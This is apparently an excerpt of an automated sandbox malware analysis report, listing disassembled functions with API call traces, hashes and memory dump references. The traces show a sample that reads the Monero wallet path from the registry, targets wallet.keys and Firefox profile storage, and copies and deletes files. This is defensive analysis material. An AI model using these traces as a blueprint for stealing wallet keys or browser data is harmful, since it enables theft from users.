                                    • Opcode Fuzzy Hash: f1447cad53cfe4802975df6622242dfd68cbf712ba074a0cbda84c2dfe240f41
                                    • Instruction Fuzzy Hash: CE51D4F3A082149BE3086F29DC4576AFBE6EF94710F17493DEAC887740DA359840CB96
                                    Function 00C1EA97 Relevance: .2, Instructions: 163COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e5b4a21d2cfcc90701a843ab3cbb6419bb32c9b8435b8e57172a77ccb9d4141f
                                    • Instruction ID: 26e03dd9ec66d2994e792c86875585371be6cfcb6bedf90c8b1e01849dbc8d07
                                    • Opcode Fuzzy Hash: e5b4a21d2cfcc90701a843ab3cbb6419bb32c9b8435b8e57172a77ccb9d4141f
                                    • Instruction Fuzzy Hash: 54519BF39086049FE314AF29E84577AF7E5EF94310F16493DEAC9C3780EA3958448A97
                                    Function 00D05539 Relevance: .1, Instructions: 110COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3eb1a9b7be9ace9dad1246178754c2c9aa9ed0d9bdbe53aa2ecc0eede0335ba
                                    • Instruction ID: 250b75cdd1a35469fe3a96d44c657d166fafe64a9fffe16cc06c47e29d8c7a8f
                                    • Opcode Fuzzy Hash: f3eb1a9b7be9ace9dad1246178754c2c9aa9ed0d9bdbe53aa2ecc0eede0335ba
                                    • Instruction Fuzzy Hash: 3D313AB250C7049FE305BF1ADC82A7AFBE9FF98750F16492DE2C483610E63594418A93
                                    Function 008D8640 Relevance: 74.0, APIs: 45, Strings: 4, Instructions: 451stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D86C7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D86FF
                                    • lstrcpy.KERNEL32(?,00000000), ref: 008D873C
                                    • StrStrA.SHLWAPI(?,0053DF80), ref: 008D8761
                                    • lstrcpyn.KERNEL32(00AF93D0,?,00000000), ref: 008D8780
                                    • lstrlen.KERNEL32(?), ref: 008D8793
                                    • wsprintfA.USER32 ref: 008D87A3
                                    • lstrcpy.KERNEL32(?,?), ref: 008D87B9
                                    • StrStrA.SHLWAPI(?,0053E0E8), ref: 008D87E6
                                    • lstrcpy.KERNEL32(?,00AF93D0), ref: 008D8846
                                    • StrStrA.SHLWAPI(?,0053DF98), ref: 008D8873
                                    • lstrcpyn.KERNEL32(00AF93D0,?,00000000), ref: 008D8892
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                    • String ID: %s%s$0S$S$S
                                    • API String ID: 2672039231-2902472881
                                    • Opcode ID: db090683cd8dcd456c0b70c01a78b0b3c9ba423ffc37510958fd52f1eb1e2019
                                    • Instruction ID: 373cc4f5c1e1d01d3890a43be9b1c7040db281cf33929200c685a588447f2ef5
                                    • Opcode Fuzzy Hash: db090683cd8dcd456c0b70c01a78b0b3c9ba423ffc37510958fd52f1eb1e2019
                                    • Instruction Fuzzy Hash: 96023B71900518EFDB10DBA8DD48AABB7B9FF48300F104699F909E7251DB74AE06CBA1
                                    Function 008C1E79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1E9F
                                    • lstrlen.KERNEL32(00538F88), ref: 008C1EAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1EDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C1EE3
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1EEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1F0E
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1F1A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1F42
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1F4D
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1F58
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1F75
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1F81
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1FAC
                                    • lstrlen.KERNEL32(?), ref: 008C1FE4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C2004
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C2012
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C2039
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C204B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C206B
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C2077
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C209D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C20A8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C20D4
                                    • lstrlen.KERNEL32(?), ref: 008C20EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C210A
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C2118
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C2142
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C217F
                                    • lstrlen.KERNEL32(0053D118), ref: 008C218D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C21B1
                                    • lstrcat.KERNEL32(00000000,0053D118), ref: 008C21B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C21F7
                                    • lstrcat.KERNEL32(00000000), ref: 008C2204
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C222D
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008C2256
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C2282
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C22BF
                                    • DeleteFileA.KERNEL32(00000000), ref: 008C22F7
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008C2344
                                    • FindClose.KERNEL32(00000000), ref: 008C2353
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                    • String ID:
                                    • API String ID: 2857443207-0
                                    • Opcode ID: e81542951b8c32d15e860f470705729595821335c9db557f756ce8d542a17663
                                    • Instruction ID: c74f75319a081c7ad4b656a942b4c84861656abf036458c2c4bbb936408e6e4f
                                    • Opcode Fuzzy Hash: e81542951b8c32d15e860f470705729595821335c9db557f756ce8d542a17663
                                    • Instruction Fuzzy Hash: 0AE1F771A1161A9BCB10EBB8C989FAE7BB9FF44300F044169B905E7291DF34DD16CBA1
                                    Function 008D68A0 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 437stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D68D5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D6910
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008D693A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6971
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6996
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D699E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D69C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FolderPathlstrcat
                                    • String ID: \..\
                                    • API String ID: 2938889746-4220915743
                                    • Opcode ID: ee818ae41ba39ef76789b8254d3346525a9e1ac770515e49d1fbdb9ed0090cd8
                                    • Instruction ID: ee4f12ac6a53e6753e58f703d35e9d08cb7e49aa6b73c88f1b4e94270df0b228
                                    • Opcode Fuzzy Hash: ee818ae41ba39ef76789b8254d3346525a9e1ac770515e49d1fbdb9ed0090cd8
                                    • Instruction Fuzzy Hash: 3AF15F70A016199BDB21EFB8D849FAE7BB5FF44300F04422AA855D7391EB34DD16CB92
                                    Function 008D4720 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4753
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4786
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D47AE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D47B9
                                    • lstrlen.KERNEL32(\storage\default\), ref: 008D47C4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D47E1
                                    • lstrcat.KERNEL32(00000000,\storage\default\), ref: 008D47ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4816
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4821
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4848
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4887
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D488F
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D489A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D48B7
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D48C3
                                    • lstrlen.KERNEL32(.metadata-v2), ref: 008D48CE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D48EB
                                    • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 008D48F7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D491E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4950
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008D4957
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D49B1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D49DA
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4A03
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4A2B
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4A5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                    • String ID: .metadata-v2$\storage\default\
                                    • API String ID: 1033685851-762053450
                                    • Opcode ID: 726ac099dc77ddb1570f1d3764a39dafe3d2c33178c9a2fc1737e45fd57dda19
                                    • Instruction ID: eff33cc35267dfea0001b0a14fcd76e11a606f89b6e227c76db5ee7dba63b23d
                                    • Opcode Fuzzy Hash: 726ac099dc77ddb1570f1d3764a39dafe3d2c33178c9a2fc1737e45fd57dda19
                                    • Instruction Fuzzy Hash: 58B1F631A0165A9BCB20ABB8C949E6F7BB8FF44700F141229B845E73A1DF34DD168792
                                    Function 008D5BE0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D5C15
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008D5C44
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C75
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C9D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D5CA8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5CD0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5D08
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D5D13
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5D38
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D5D6E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5D96
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D5DA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5DC8
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D5DDA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5DF9
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D5E05
                                    • lstrlen.KERNEL32(0053D0D0), ref: 008D5E14
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5E37
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D5E42
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5E6C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5E98
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008D5E9F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D5EF7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D5F66
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D5F98
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D5FDB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6007
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D603F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D60B1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D60D5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2428362635-0
                                    • Opcode ID: 9b0b1532f217479b5b7498bac7fabfc06958dda74de582a1ae3d1099cad8042d
                                    • Instruction ID: ae9e9968342a49965d1c49c4557294a9f5fc9e544d805a6397fff871d704651b
                                    • Opcode Fuzzy Hash: 9b0b1532f217479b5b7498bac7fabfc06958dda74de582a1ae3d1099cad8042d
                                    • Instruction Fuzzy Hash: 65023971A01A159BCB21EFA8C889FAE7BB9FF44300F14462AE845E7391DB34DD45CB91
                                    Function 008C1070 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008C1000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C1015
                                      • Part of subcall function 008C1000: RtlAllocateHeap.NTDLL(00000000), ref: 008C101C
                                      • Part of subcall function 008C1000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008C1039
                                      • Part of subcall function 008C1000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008C1053
                                      • Part of subcall function 008C1000: RegCloseKey.ADVAPI32(?), ref: 008C105D
                                    • lstrcat.KERNEL32(?,00000000), ref: 008C10A0
                                    • lstrlen.KERNEL32(?), ref: 008C10AD
                                    • lstrcat.KERNEL32(?,.keys), ref: 008C10C8
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C10FF
                                    • lstrlen.KERNEL32(00538F88), ref: 008C110D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1131
                                    • lstrcat.KERNEL32(00000000,00538F88), ref: 008C1139
                                    • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 008C1144
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1168
                                    • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 008C1174
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C119A
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C11DF
                                    • lstrlen.KERNEL32(0053D118), ref: 008C11EE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1215
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C121D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1258
                                    • lstrcat.KERNEL32(00000000), ref: 008C1265
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C128C
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008C12B5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C12E1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C131D
                                      • Part of subcall function 008DEF30: lstrcpy.KERNEL32(00000000,?), ref: 008DEF62
                                    • DeleteFileA.KERNEL32(?), ref: 008C1351
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
